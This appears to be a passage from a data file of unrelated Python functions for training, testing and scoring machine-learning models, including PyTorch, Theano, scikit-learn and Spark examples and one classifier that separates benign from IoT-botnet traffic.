print(\"Memory usage: %s (kb)\" % resource.getrusage(resource.RUSAGE_SELF).ru_maxrss)\n past_rewards = {str(q_id.long().item()): deque(maxlen=mean_window)\n for _, _, q_ids, _ in chain(trainloader, testloader)\n for q_id in q_ids}\n \n logs = [\"reward\",\n \"scaled_entropy\",\n \"scaled_reinforce\",\n \"scaled_smt\",\n \"total_loss\",\n \"accuracy\"]\n train_logs = {log: list() for log in logs}\n test_logs = {log: list() for log in logs}\n del logs\n \n for epoch in range(nb_epoch):\n running_loss, running_reward = [], []\n entropies, reinforces, smts = [], [], []\n nb_correct, nb_total = 0, 0\n print(f\"\\nEpoch {epoch}\")\n \n print(\"Begin epoch: %s (kb)\" % resource.getrusage(resource.RUSAGE_SELF).ru_maxrss)\n model.train()\n for x, y, q_id, masks in trainloader:\n x = x.to(device)\n y = y.to(device)\n masks = masks.to(device)\n\n # batch x seq , batch x seq , batch x seq\n sample, logits, entropy, params = model(x, masks)\n batch_reward, rewards = eval_fn(sample.detach().t().tolist(), q_id)\n losses = compute_losses(y, params, rewards, logits, past_rewards,\n entropy, entropy_lambda, reinforce_lambda, smt_lambda, device)\n\n # entropy_lambda = min(1.01*entropy_lambda, 0.025)\n # reinforce_lambda = min(1.01*reinforce_lambda, 1.0)\n # smt_lambda = max(0.99*smt_lambda, 0.05)\n loss, reinforce_loss, entropy, smt_loss = losses\n optimizer.zero_grad()\n loss.backward()\n optimizer.step()\n \n temp = (sample.long() == y.detach().long()).float() * masks\n nb_correct += temp.byte().cpu().sum().tolist()\n nb_total += masks.cpu().sum().tolist()\n\n running_loss.append(loss.item())\n running_reward.extend(rewards.values())\n print(f\"\\rTr Loss {mean(running_loss): .3f} Rewa {mean(running_reward): .5f}\", end=\"\")\n \n reinforces.append(reinforce_loss.item())\n entropies.append(entropy.item())\n smts.append(smt_loss.item())\n\n # Logs\n train_logs[\"reward\"].append(mean(running_reward))\n train_logs[\"scaled_entropy\"].append(mean(entropies))\n train_logs[\"scaled_reinforce\"].append(mean(reinforces))\n train_logs[\"scaled_smt\"].append(mean(smts))\n train_logs[\"total_loss\"].append(mean(running_loss))\n train_logs[\"accuracy\"].append(nb_correct / nb_total)\n \n \n train_loss, train_reward = mean(running_loss), mean(running_reward)\n running_loss, running_reward = [], []\n entropies, reinforces, smts = [], [], []\n nb_correct, nb_total = 0, 0\n model.eval()\n for x, y, q_id, masks in testloader:\n x = x.to(device)\n y = y.to(device)\n masks = masks.to(device)\n\n # batch x seq , batch x seq , batch x seq\n sample, logits, entropy, params = model(x, masks)\n batch_reward, rewards = eval_fn(sample.detach().t().tolist(), q_id)\n\n losses = compute_losses(y, params, rewards, logits, past_rewards,\n entropy, entropy_lambda, reinforce_lambda, smt_lambda, device)\n loss, reinforce_loss, entropy, smt_loss = losses\n \n temp = (sample.long() == y.detach().long()).float() * masks\n nb_correct += temp.byte().sum().tolist()\n nb_total += masks.sum().tolist()\n\n running_loss.append(loss.item())\n running_reward.extend(rewards.values())\n print(f\"\\rTr Loss {train_loss: .3f} Rewa {train_reward: .3f}\",\n f\"Te Loss{mean(running_loss): .3f} Rewa {mean(running_reward): .3f}\",\n end=\"\")\n \n reinforces.append(reinforce_loss.item())\n entropies.append(entropy.item())\n smts.append(smt_loss.item())\n \n \n # Logs\n test_logs[\"reward\"].append(mean(running_reward))\n test_logs[\"scaled_entropy\"].append(mean(entropies))\n test_logs[\"scaled_reinforce\"].append(mean(reinforces))\n test_logs[\"scaled_smt\"].append(mean(smts))\n test_logs[\"total_loss\"].append(mean(running_loss))\n test_logs[\"accuracy\"].append(nb_correct / nb_total)\n \n\n return model, train_logs, test_logs", "def model_evaluate(model,x_train,n_y_array,x_val, vald_array):\n\n scores = model.evaluate(x_train, n_y_array, verbose=1)\n\n scores2 = model.evaluate(x_val, vald_array, verbose=1)\n\n\n print(\"for traininf set\")\n\n print(\"%s: %.2f%%\" % (model.metrics_names[1], scores[1]*100))\n\n print(\"%s: %.2f%%\" % (model.metrics_names[0], scores[0]))\n\n\n\n print(\"for validation set : \") \n\n print(\"%s: %.2f%%\" % (model.metrics_names[1], scores2[1]*100))\n\n print(\"%s: %.2f%%\" % (model.metrics_names[0], scores2[0]))", "def final_eval(self):\n # Test performance - Load best model\n self.load_model(self.best_model_path, model_type='best')\n logging.info(\"Loading best model after epoch: %d\" %\n self.train_info['epoch'])\n\n perf_file = path.join(self.model_dir, \"perf.json\")\n if self.slurm_id:\n parent_dir = path.dirname(path.normpath(self.model_dir))\n perf_dir = path.join(parent_dir, \"perf\")\n if not path.exists(perf_dir):\n os.makedirs(perf_dir)\n perf_file = path.join(perf_dir, self.slurm_id + \".json\")\n\n output_dict = {'model_dir': self.model_dir}\n for key, val in vars(self.args).items():\n output_dict[key] = val\n\n for split in ['dev', 'test']:\n logging.info('\\n')\n logging.info('%s' % split.capitalize())\n result_dict = self.eval_model(split, final_eval=True)\n if split != 'test':\n logging.info('Calculated F1: %.3f' % result_dict['fscore'])\n\n output_dict[split] = result_dict\n\n json.dump(output_dict, open(perf_file, 'w'), indent=2)\n\n logging.info(\"Final performance summary at %s\" % perf_file)\n sys.stdout.flush()", "def modelfit(alg, data, features, target):\n\n # Split data into train and test.\n X_train, X_test, y_train, y_test = model_selection.train_test_split(data[features], data[target],\n test_size=.2)\n\n # Baseline fit.\n alg.fit(X_train, y_train)\n train_predictions = alg.predict(X_train)\n print(\"RMSE Train (Pre-CV): %.4g\" % np.sqrt(metrics.mean_squared_error(y_train, train_predictions)))\n\n\n # Cross_validation/hyper-parameter selection.\n #dtr_cv(alg, X_train, y_train)\n\n # Report results + visualize.\n test_predictions = alg.predict(X_test)\n print(\"RMSE Test: %.4g\" % np.sqrt(metrics.mean_squared_error(y_test, test_predictions)))\n\n plot_results(y_test, test_predictions)", "def test_per_dqn(self):\n model = PERDQNLightning(self.hparams)\n result = self.trainer.fit(model)\n\n self.assertEqual(result, 1)", "def test(self):\n self.model.eval()\n\n for step, sample in enumerate(self.test_loader):\n x, _, _ = sample\n x = x.to(self.device)\n\n y_pred = self.model.forward(x)\n loss = nn.MSELoss()(y_pred, x)\n self.test_losses.append(loss.item())\n\n if step % (max(8, len(self.test_loader)) // 8) == 0:\n out_img = torch.cat([x[0], torch.clamp(y_pred[0], 0, 1)], dim=2)\n self.sw.add_image(tag=f'sample_{step}', img_tensor=out_img, global_step=self.epoch)\n\n # log average loss on test set\n mean_test_loss = np.mean(self.test_losses)\n self.test_losses = []\n print(f'\\t● AVG Loss on TEST-set: {mean_test_loss:.6f} │ patience: ', end='')\n self.sw.add_scalar(tag='test_loss', scalar_value=mean_test_loss, global_step=self.epoch)\n\n # save best model and update training patience\n if self.best_test_loss is None or mean_test_loss < self.best_test_loss:\n self.best_test_loss = mean_test_loss\n self.patience = conf.FX_PATIENCE\n torch.save(self.model.state_dict(), self.log_path / 'best.pth')\n else:\n self.patience = self.patience - 1\n print(f'{self.patience}/{conf.FX_PATIENCE}')\n\n if self.patience == 0:\n self.show_completion_msg()", "def computeRmse(model, data, n , sc):\n truth = data.map( lambda x: ((x[0], x[1]), x[2]) )\n truth.cache()\n ##print 'test zhou 0.....', truth.count() , '............', truth.take(10)\n\n predictions = model.predictAll(data.map(lambda x: (x[0], x[1])))\n predictions.cache()\n # here let's rescale predicted ratings to 0-10 scale\n maxPrediction = predictions.map(lambda x: x[2]).max()\n minPrediction = predictions.map(lambda x: x[2]).min()\n maxRate = RatingScale\n minRate = RatingScaleMin\n ##print 'test zhou 1......', predictions.count(), '............', predictions.take(10)\n\n #predictionsAndRatings = predictions.map(lambda x: ((x[0], x[1]), (x[2]-minPrediction)/(maxPrediction-minPrediction)*(maxRate-minRate)+minRate )).join(data.map(lambda x: ((x[0], x[1]), x[2]))).values()\n\n\n #predictedRating = predictions.map(lambda x: ((x[0], x[1]), (x[2]-minPrediction)/(maxPrediction-minPrediction)*(maxRate-minRate)+minRate ) )\n predictedRating = predictions.map(lambda x: ((x[0], x[1]), x[2] ) )\n predictedRating.cache()\n ##predictedRating.checkpoint()\n ##print 'test zhou 2.......', predictedRating.count(), '............', predictedRating.take(10)\n\n\n \n\n\n predictionsAndRatings = predictedRating.join(truth).values()\n #predictionsAndRatings = sc.union(predictedRating, truth)\n predictionsAndRatings.cache()\n #print 'test zhou 3........', predictionsAndRatings.count(), '............', predictionsAndRatings.take(10)\n #predictionsAndRatings = predictions.map(lambda x: ((x[0], x[1]), x[2])).join(data.map(lambda x: ((x[0], x[1]), x[2]))).values()\n \n return sqrt(predictionsAndRatings.map(lambda x: (x[0] - x[1]) ** 2).reduce(add) / float(n))\n #return 1.0", "def model_evaluation(X_train, y_train, X_test, y_test, k=16):\n print(\">>>>>>> x.shape\", X_train.shape)\n p_matrix, X_reduce = dimension_reduction(X_train, k=k)\n print(\"model training ...\")\n bdt = AdaBoostClassifier(DecisionTreeClassifier(max_depth=2), n_estimators=30, learning_rate=1)\n bdt.fit(X_reduce, y_train)\n print(\"fit succeed\")\n\n X_test = np.dot(X_test, p_matrix)\n y_pred = bdt.predict(X_test)\n print(classification_report(y_test, y_pred, target_names=['benign', 'gafgyt', 'miari'], digits=4))", "def compute_test():\n model.eval()\n sets = list(features.keys())\n for dset, loaders in zip(sets, [train_loaders, val_loaders, test_loaders]):\n final_specific_loss = 0\n final_total_loss = 0\n for loader in loaders:\n loader_total_loss = 0\n loader_specific_loss = 0\n for data in loader:\n output = model(data.to(device))\n specific_loss = specific_loss_torch_geom(output, (data.pos, data.y),\n data.batch, batch_sizes[dset]).detach()\n loader_specific_loss += specific_loss\n loader_total_loss += torch.mean(specific_loss)\n # Average the loss over each loader\n loader_specific_loss /= len(loader)\n loader_total_loss /= len(loader)\n # Average the loss over the different loaders\n final_specific_loss += loader_specific_loss / len(loaders)\n final_total_loss += loader_total_loss / len(loaders)\n del output, loader_specific_loss\n\n print(\"Test set results \", dset, \": loss= {:.4f}\".format(final_total_loss))\n print(dset, \": \", final_specific_loss)\n print(\"Results in log scale\", np.log10(final_specific_loss.detach().cpu()),\n np.log10(final_total_loss.detach().cpu().numpy()))\n if args.wandb:\n wandb.run.summary[\"test results\"] = np.log10(final_specific_loss.detach().cpu())\n # free unnecessary data\n\n\n final_specific_numpy = np.log10(final_specific_loss.detach().cpu())\n del final_total_loss, final_specific_loss\n torch.cuda.empty_cache()\n return final_specific_numpy", "def train(self,path,mode):\n if mode == \"porto\":\n self.prepare_data(path)\n else:\n self.prepare_sumo_data(path)\n self.poly_regression()", "def train(self):\n pass", "def train(self):\n pass", "def train(self):\n pass", "def train(self):\n pass", "def train(self):\n pass", "def test_machine_learning():", "def test_model_performance(model_es,test_file):\n test_label = get_test_label(test_file)\n result = model_es.predict(input_fn = lambda :input_fn(test_file,1,False,100,True))\n predict_list = []\n for one_res in result:\n if \"probabilities\" in one_res:\n predict_list.append(one_res['probabilities'][1])\n get_auc(predict_list,test_label)", "def eval_regression_performance(dset, model, scaler, measure):\n X = dset[\"X\"]\n y = dset[\"y\"]\n y = y.reshape((len(y), 1))\n yhat = model.predict(X)\n\n # afecta en algo aplicar invers_stransform sobre una sola columna que con tra la matriz?\n prediction = scaler.inverse_transform(yhat)\n\n # invert scaling for actual\n true = scaler.inverse_transform(y)\n\n # calculate MAE\n performance = measure(true, prediction)\n return performance", "def test(self):\n for data_tier in self.data_tiers:\n tot = len(self.preprocessed_data[data_tier]['features'])\n p = int(math.floor(tot*0.2))\n test_features = np.array(self.preprocessed_data[data_tier]['features'][p:])\n trend_test_classifications = np.array(self.preprocessed_data[data_tier]['trend_classifications'][p:])\n avg_test_classifications = np.array(self.preprocessed_data[data_tier]['avg_classifications'][p:])\n accuracy_trend = self.clf_trend[data_tier].score(test_features, trend_test_classifications)\n accuracy_avg = self.clf_avg[data_tier].score(test_features, avg_test_classifications)\n self.logger.info('The accuracy of %s trend classifier for data tier %s is %.3f', self.name, data_tier, accuracy_trend)\n self.logger.info('The accuracy of %s avg regressor for data tier %s is %.3f', self.name, data_tier, accuracy_avg)", "def get_perf(self) :\n self.train()\n self.df_true = self.df_true[self.length:]\n self.accuracy , self.recall, self.specificity, self.profit, self.min , self.max = get_accuracy_LSTM(self.df_test, self.df_true,self.model, self.length)", "def main():\n housing = pd.read_csv(\"Data/train_original.csv\")\n housing[\"TotalSF\"] = (\n housing[\"TotalBsmtSF\"] + housing[\"1stFlrSF\"] + housing[\"2ndFlrSF\"]\n )\n training_features, testing_features, training_target, testing_target = impute_dummify_and_split(\n housing, drop_target=False\n )\n\n p_values = [\n (c, pearsonr(training_features[\"SalePrice\"], training_features[c])[1])\n for c in training_features.columns\n ]\n\n p_value_limits = [0.05]\n\n result = []\n ps_and_cols = {}\n\n for p_value_limit in p_value_limits:\n\n high_ps = list(\n map(lambda t: t[0], sorted(p_values, key=lambda t1: t1[1])[:15])\n )\n\n print(training_features[high_ps].corr())\n\n columns = [p[0] for p in p_values if p[1] < p_value_limit]\n\n training_features_restricted = training_features[columns].drop(\n \"SalePrice\", axis=\"columns\"\n )\n\n testing_features_restricted = testing_features[columns].drop(\n \"SalePrice\", axis=\"columns\"\n )\n\n for model in (\n linear_model.Lasso(alpha=2.1),\n linear_model.Ridge(alpha=2.1),\n ):\n\n model.fit(training_features_restricted, training_target)\n\n train_score = model.score(\n training_features_restricted, training_target\n )\n\n test_score = model.score(\n testing_features_restricted, testing_target\n )\n\n name = str(model).split(\"(\")[0]\n\n result = result + [\n (\n \"_2_restrict_features\",\n name,\n \"p value limit: {:.3f}, alpha: 2.1\".format(p_value_limit),\n train_score,\n test_score,\n )\n ]\n\n print(ps_and_cols)\n return training_features[high_ps].corr()", "def assess_perf(self, bases: list, set_type, epoch):\n self.prepare_calc_performance()\n self.base_dfl = dict() # base dict of lists with prediction data frames\n for base in bases:\n self.base_dfl[base] = list()\n ohlcv_list = ad.SplitSets.split_sets(set_type, self.predictor.ohlcv.load_data(base))\n features_list = ad.SplitSets.split_sets(set_type, self.predictor.features.load_data(base))\n targets_list = ad.SplitSets.split_sets(set_type, self.predictor.targets.load_data(base))\n assert len(ohlcv_list) == len(features_list)\n assert len(ohlcv_list) == len(targets_list)\n for ix in range(len(ohlcv_list)):\n odf = ohlcv_list[ix]\n fdf = features_list[ix]\n tdf = targets_list[ix]\n if (fdf is None) or fdf.empty or (tdf is None) or tdf.empty:\n logger.warning(f\"empty data for {base} between {odf.index[0]} and {odf.index[-1]}\")\n continue\n [fdf, tdf] = ccd.common_timerange([fdf, tdf])\n\n if self.predictor.scaler is not None:\n fdf_scaled = self.predictor.scaler.transform(fdf.values)\n pred = self.predictor.kerasmodel.predict_on_batch(fdf_scaled)\n else:\n logger.error(\"missing scaler\")\n pred = self.predictor.kerasmodel.predict_on_batch(fdf.values)\n if pred is None:\n logger.warning(f\"no prediction data for {base} between {odf.index[0]} and {odf.index[-1]}\")\n continue\n pdf = pd.DataFrame(data=pred, index=fdf.index, columns=self.predictor.targets.target_dict().keys())\n pdf.loc[pdf.index[-1], ct.SELL] = 1 # force sell at end of data range\n if pdf.empty:\n logger.warning(f\"empty prediction data for {base} between {odf.index[0]} and {odf.index[-1]}\")\n continue\n pdf = pd.concat([odf.close, tdf.target, pdf], axis=1, join=\"inner\")\n self.base_dfl[base].append(self.calc_performance(pdf))\n logger.info(f\"\\n performance results \\n{self.total}\\n\")\n logger.info(f\"\\n precision results \\n{self.confusion}\\n\")\n return self.find_best()", "def test_model(self, batch_size):\n (_, gen_val, gen_test) = self.dataset.data_loaders(\n batch_size=batch_size,\n split=(0.01, 0.01)\n )\n print('Num Test Batches: ', len(gen_test))\n mean_loss_test, mean_accuracy_test = self.loss_and_acc_test(gen_test)\n print('Test Epoch:')\n print(\n '\\tTest Loss: ', mean_loss_test, '\\n'\n '\\tTest Accuracy: ', mean_accuracy_test * 100\n )", "def test_10_test_model(self, example):\n res = example.calc_model()\n print(example.trips_ij)\n total_trips_target = example.persons_gi.sum()\n total_trips_actual = example.trips_ij.sum()\n np.testing.assert_almost_equal(total_trips_target, total_trips_actual)", "def main_stats_model(y_train: pd.DataFrame, y_test: pd.DataFrame, y_pred: np.ndarray,\n model_name: str = '',\n model_parameters: dict = None,\n model_preprocessing: str = '',\n sequence_origin: str = '',\n primers_origin: str = '',\n taxonomy_level: Union[List[int], int] = '',\n selected_primer: Union[List[str], str] = '',\n test_size: float = 0.2,\n feature_importances: np.ndarray = None,\n k: int = 4,\n save_csv: bool = False,\n xgb_model=None,\n rf_model=None,\n save_model=False,\n save_tree: int = 0):\n model_path = folder_paths['model_results'] + model_name + '{}'.format(slash)\n if not os.path.exists(model_path):\n os.makedirs(model_path)\n\n folder_number = get_new_model_folder_number(model_name=model_name)\n analysis_path = model_path + '{:0>5d}_analysis_{}_{}{}'.format(folder_number, selected_primer, taxonomy_level, slash)\n os.makedirs(analysis_path)\n\n log_path = analysis_path + 'model_results.txt'\n logger = StatLogger(log_path=log_path)\n\n # Basic information on configuration\n test_size = get_model_info(y_test, model_name, model_parameters, model_preprocessing, sequence_origin,\n primers_origin, taxonomy_level, selected_primer, test_size, logger)\n\n # Metrics of model results\n main_class_prop, accuracy = get_metrics_model(y_train, y_test, y_pred, logger, feature_importances, k, save_tree,\n xgb_model,\n analysis_path=analysis_path)\n\n if save_csv:\n add_optimal_model_params(folder_number, selected_primer, taxonomy_level, accuracy, model_parameters,\n model_path=model_path)\n\n if save_model:\n if xgb_model is not None:\n xgb_model.save_model(analysis_path+'0001.model')\n if rf_model is not None:\n filename = analysis_path+'0001.model'\n pickle.dump(rf_model, open(filename, 'wb'))\n\n logger.close_file()\n\n return test_size, main_class_prop, accuracy", "def test_model(net, data_loader):\n net.eval()\n running_loss = 0.0\n with torch.no_grad():\n for data in data_loader:\n X = data['X']\n y_d = data['y_descreen']\n outputs = net(X)\n loss = criterion(outputs, y_d)\n running_loss += loss\n return running_loss", "def master_modelisation(X,y,test_size,model_function_list) :\n models = model_function_list\n\n output = pd.DataFrame()\n model = []\n RMSE = []\n MAPE = []\n tenth_perc = []\n ninetieth_perc = []\n\n for i in models:\n output_row = pd.DataFrame()\n\n model.append(i)\n\n y_pred, y_test = i(df, variables, test_size)\n\n RMSE.append(compute_rmse(y_test, y_pred))\n MAPE.append(compute_mape(y_test, y_pred))\n tenth_perc.append(tenth_percentile(y_test, y_pred))\n ninetieth_perc.append(ninetieth_percentile(y_test, y_pred))\n\n output['Model'] = model\n output['RMSE'] = RMSE\n output['MAPE'] = MAPE\n output['tenth_perc'] = tenth_perc\n output['ninetieth_perc'] = ninetieth_perc\n\n return output", "def test_model():\n pass", "def test_model(model: nn.Module, test_set: data.DataLoader, number_of_classes: int) -> Tuple[score.FloatScore, score.DictScore]:\n # model.eval is used for ImageNet models, batchnorm or dropout layers will work in eval mode.\n model.eval()\n\n def test_average() -> score.FloatScore:\n correct = 0\n total = 0\n\n with torch.set_grad_enabled(False):\n for (inputs, yreal) in tqdm(test_set, unit=\"images\", desc=\"Testing model (average)\", leave=True, ascii=True):\n inputs, yreal = inputs.cuda(), yreal.cuda()\n\n ypred = model(inputs)\n _, predicted = torch.max(ypred.data, 1)\n\n total += yreal.size(0)\n correct += (predicted == yreal).sum().item()\n\n accuracy = 100 * correct / total\n log.info(\"Accuracy of the network on the {} test images (average): {}\".format(total, accuracy))\n with open('epoch_logs.txt', 'a+') as file:\n file.write('Test Acc: {}\\n'.format(accuracy))\n return score.FloatScore(accuracy)\n\n def test_per_class() -> score.DictScore:\n class_correct = list(0. for _ in range(number_of_classes))\n class_total = list(0. for _ in range(number_of_classes))\n total = 0\n\n with torch.no_grad():\n for (inputs, yreal) in tqdm(test_set, unit=\"images\", desc=\"Testing model (per class)\", leave=True, ascii=True):\n inputs, yreal = inputs.cuda(), yreal.cuda()\n\n total += yreal.size(0)\n\n ypred = model(inputs)\n _, predicted = torch.max(ypred, 1)\n c = (predicted == yreal).squeeze()\n for i in range(yreal.shape[0]):\n label = yreal[i]\n class_correct[label] += c[i].item()\n class_total[label] += 1\n\n log.info(\"Accuracy of the network on the {} test images (per-class):\".format(total))\n\n per_class_accuracy = {}\n for i in range(number_of_classes):\n accuracy = 100 * class_correct[i] / (class_total[i] + 0.0001)\n per_class_accuracy[i] = accuracy\n print('Accuracy of %5s : %2d %%' % (\n i, accuracy))\n\n return score.DictScore(per_class_accuracy)\n\n return test_average(), test_per_class()", "def train():\n pass", "def evaluate(self, train_set, test_set, shuffle_batch=True,\n epochs=25, lr_decay=0.95, sqr_norm_lim=9,labels=None,model=None): \n cost = self.negative_log_likelihood(self.y) \n dropout_cost = self.dropout_negative_log_likelihood(self.y)\n # adadelta upgrades: dict of variable:delta\n grad_updates = self.sgd_updates_adadelta(dropout_cost, lr_decay, 1e-6, sqr_norm_lim)\n # shuffle dataset and assign to mini batches.\n # if dataset size is not a multiple of batch size, replicate \n # extra data (at random)\n np.random.seed(3435)\n batch_size = self.batch_size\n if train_set.shape[0] % batch_size > 0:\n extra_data_num = batch_size - train_set.shape[0] % batch_size\n #extra_data = train_set[np.random.choice(train_set.shape[0], extra_data_num)]\n perm_set = np.random.permutation(train_set) \n extra_data = perm_set[:extra_data_num]\n new_data = np.append(train_set, extra_data, axis=0)\n else:\n new_data = train_set\n \n shuffled_data = np.random.permutation(new_data) # Attardi\n n_batches = shuffled_data.shape[0]/batch_size\n # divide train set into 90% train, 10% validation sets\n n_train_batches = int(np.round(n_batches*0.8))\n n_val_batches = n_batches - n_train_batches\n train_set = shuffled_data[:n_train_batches*batch_size,:]\n val_set = shuffled_data[n_train_batches*batch_size:,:] \n # push data to gpu \n # the dataset has the format [word_indices,padding,user,label]\n train_set_x, train_set_y = shared_dataset(train_set[:,:-2], train_set[:,-1]) \n train_set_u = theano.shared(np.asarray(train_set[:,-2],dtype='int32')) \n # val_set_x = val_set[:,:-2]\n # val_set_u = val_set[:,-2]\n # val_set_y = val_set[:,-1]\n val_set_x, val_set_y = shared_dataset(val_set[:,:-2], val_set[:,-1])\n val_set_u = theano.shared(np.asarray(val_set[:,-2],dtype='int32')) \n test_set_x = test_set[:,:-2]\n test_set_u = test_set[:,-2]\n test_set_y = test_set[:,-1] \n batch_start = self.index * batch_size\n batch_end = batch_start + batch_size\n\n # compile Theano functions to get train/val/test errors\n \n \n test_y_pred = self.predict(test_set_x,test_set_u)\n test_error = T.mean(T.neq(test_y_pred, self.y))\n # errors on train set\n if self.Users is not None:\n train_model = theano.function([self.index], cost, updates=grad_updates,\n givens={\n self.x: train_set_x[batch_start:batch_end],\n self.y: train_set_y[batch_start:batch_end],\n self.u: train_set_u[batch_start:batch_end]\n },\n allow_input_downcast = True)\n\n train_error = theano.function([self.index], self.errors(self.y),\n givens={\n self.x: train_set_x[batch_start:batch_end],\n self.y: train_set_y[batch_start:batch_end],\n self.u: train_set_u[batch_start:batch_end]},\n allow_input_downcast=True)\n val_model = theano.function([self.index], self.errors(self.y),\n givens={\n self.x: val_set_x[batch_start:batch_end],\n self.y: val_set_y[batch_start:batch_end], \n self.u: val_set_u[batch_start:batch_end]},\n allow_input_downcast=True)\n test_model = theano.function([self.x, self.u, self.y], test_error, allow_input_downcast=True)\n else:\n train_model = theano.function([self.index], cost, updates=grad_updates,\n givens={\n self.x: train_set_x[batch_start:batch_end],\n self.y: train_set_y[batch_start:batch_end]},\n allow_input_downcast = True)\n\n train_error = theano.function([self.index], self.errors(self.y),\n givens={\n self.x: train_set_x[batch_start:batch_end],\n self.y: train_set_y[batch_start:batch_end]},\n allow_input_downcast=True)\n\n val_model = theano.function([self.index], self.errors(self.y),\n givens={\n self.x: val_set_x[batch_start:batch_end],\n self.y: val_set_y[batch_start:batch_end]},\n allow_input_downcast=True)\n test_model = theano.function([self.x, self.y], test_error, allow_input_downcast=True)\n\n # start training over mini-batches\n print 'training...' \n best_val_perf = 0\n test_perf = 0 \n patience = 5\n drops = 0\n prev_val_perf = 0 \n for epoch in xrange(epochs):\n start_time = time.time()\n # FIXME: should permute whole set rather than minibatch indexes\n if shuffle_batch:\n for minibatch_index in np.random.permutation(range(n_train_batches)):\n cost_epoch = train_model(minibatch_index)\n self.set_zero(self.zero_vec) # CHECKME: Why?\n else:\n for minibatch_index in xrange(n_train_batches):\n cost_epoch = train_model(minibatch_index) \n self.set_zero(self.zero_vec)\n train_losses = [train_error(i) for i in xrange(n_train_batches)]\n train_perf = 1 - np.mean(train_losses)\n val_losses = [val_model(i) for i in xrange(n_val_batches)]\n val_perf = 1 - np.mean(val_losses) \n info = 'epoch: %i\\%i (%.2f secs) train acc: %.2f %% | val acc: %.2f %%' % (\n epoch,epochs, time.time()-start_time, train_perf * 100., val_perf*100.) \n # from ipdb import set_trace; set_trace()\n if val_perf > prev_val_perf: \n drops=0\n if val_perf >= best_val_perf:\n best_val_perf = val_perf\n info+= \" **\"\n if model:\n # print \"save model\"\n self.save(model)\n if self.Users is not None:\n test_loss = test_model(test_set_x, test_set_u, test_set_y)\n else:\n test_loss = test_model(test_set_x, test_set_y)\n test_perf = 1 - test_loss \n else: \n drops+=1\n if drops >= patience:\n print \"Ran out of patience...\"\n break\n prev_val_perf = val_perf\n print info\n # set_trace() \n return test_perf", "def fit_model(X_train, X_test, y_train, y_test, model):\n \n if model == 'LinearRegression':\n \n regressor=LinearRegression()\n regressor.fit(X_train,y_train)\n y_pred =regressor.predict(X_test)\n r2 = r2_score(y_test, y_pred)\n \n elif model == 'Lasso':\n \n lasso = Lasso()\n lasso.fit(X_train, y_train)\n lasso_pred = lasso.predict(X_test)\n r2 = r2_score(y_test, lasso_pred)\n\n elif model == 'Ridge':\n \n ridge = Ridge()\n ridge.fit(X_train, y_train)\n ridge_pred = ridge.predict(X_test)\n r2 = r2_score(y_test, ridge_pred)\n \n \n else:\n model = make_pipeline(PolynomialFeatures(2), LinearRegression())\n model.fit(X_train, y_train)\n y_pred = model.predict(X_test)\n r2= r2_score(y_test,y_pred)\n\n\n return r2", "def train(models, X_train, y_train, X_test, y_test):\n \n # Train and test each model in a for lop\n accuracies = []\n \n for model in models:\n clf = model.fit(X_train, y_train) # Train\n score = clf.score(X_test, y_test) # Test\n accuracies.append(score)\n\n return accuracies", "def train_model(algorithm, X_train, y_train, X_test, y_test, cv_type='rand', transformation_type='tf'):\n \n model = algorithm(X_train, y_train, cv_type=cv_type)\n model_preds = model.predict(X_test)\n model_score = f1_score(y_test, model_preds, average='weighted')\n \n return model, model_score, transformation_type", "def one_experiment():\n\n # set the name of the experiment\n now = datetime.datetime.now()\n experiment_id = str(now.day) + \"_\" + str(now.month) + \"_\" + str(now.hour) + \".\" + str(now.minute)\n experiment_name = 'overfit_' + str(experiment_id)\n\n # define if you want to use preprocessed data from file\n use_prep_data = False\n if use_prep_data:\n set_params(preproc_data_id='16_5_10.16.47')\n\n # define the changing parameter and its value\n changing_param_name = 'class_weights'\n changing_param_value = [{0: 15, 1: 85}]\n # {0:15, 1:85}]#, {0:4, 1:100}, {0:3, 1:100}, {0:2, 1:100}, {0:1, 1:100}] #[{0:1, 1:1}, {0:15, 1:85}]#\n\n features_to_use = ['user', 'countries', 'session', 'format', 'token']\n # set constant parameters\n set_params(use_word_emb=1)\n set_params(epochs=40)\n set_params(features_to_use=features_to_use)\n\n # save constant parameters to a new \"experiment_..\" filgithx+P@2ub\n save_constant_parameters(experiment_name, changing_param_name)\n\n # run experiment for every parameter value\n for value in changing_param_value:\n process = psutil.Process(os.getpid())\n print(\"-----MEMORY before starting experiment ------\", int(process.memory_info().rss/(8*10**3)), \"KB\")\n\n # update the parameter value\n set_params(class_weights_1=value)\n\n # update the model_id for this new model\n now = datetime.datetime.now()\n new_model_id = str(now.day) + \"_\" + str(now.month) + \"_\" + str(now.hour) + \".\" + str(now.minute) + \".\" + str(now.second)\n\n set_params(model_id=new_model_id)\n\n # evaluate the new model and save the results in the experiment file\n oneExperiment = Process(target=run_experiment, args=(experiment_name,\n new_model_id, changing_param_name, value,))\n oneExperiment.start()\n oneExperiment.join()", "def computeModel(self, name, data):\n\t\tif name == \"Weibull\":\n\t\t\tmodel = Weibull(data)\n\t\t\tnamePL = \"Weibull\"\n\n\t\telif name == \"Exponential\":\n\t\t\tmodel = Exponential(data)\n#\t\t\tnamePL = \"Wykładniczy (Goel-Okumoto)\"\n\t\t\tnamePL = \"Wykładniczy\"\n\n\t\telif name == \"Gamma\":\n\t\t\tmodel = Gamma(data)\n#\t\t\tnamePL = \"Gamma (S-kształtny)\"\n\t\t\tnamePL = \"Gamma\"\n\n\t\telif name == \"Logarithmic\":\n\t\t\tmodel = Logarithmic(data)\n#\t\t\tnamePL = \"Logarytmiczny (Musa-Okumoto)\"\n\t\t\tnamePL = \"Logarytmiczny\"\n\n\t\telif name == \"Power\":\n\t\t\tmodel = Power(data)\n#\t\t\tnamePL = \"Potęgowy (Duane)\"\n\t\t\tnamePL = \"Potęgowy\"\n\n\t\telse:\n\t\t\traise Exception, \"Nieznany model '%s'\" % name\n\n\t\tprint \"\\n---\\n\", name, \"estimating...\",\n\n\t\ttry:\n\t\t\tparam, chi, ret, akaike = model.fit()\n\t\texcept Exception, e:\n\t\t\tprint \"Wyjatek!\", e\n\t\t\treturn [None, \"brak\", \"brak\", INF, name, namePL, INF]\n\n\t\t# oblicza pozostale wartosci wykresu\n\t\tbeg = len(ret) + 1\n\t\tend = beg + int((self.white2 - self.black2)/self.granSec) + 1\n\t\tcont = model.calculate(param, range(beg, end))\n\t\tret.extend(cont)\n\n\t\tprint \" alfa,beta=\", param,\n\t\tprint \" chi=\", chi\n\t\tprint \" akaike=\", akaike\n\t\tprint ret\n\n\t\t# formatowanie\n\t\talfa = round(param[0], 4)\n\t\tif len(param) == 2: \n\t\t\tbeta = round(param[1], 4) \n\t\telse: \n\t\t\tbeta = ' ';\t\t# nie ma beta w 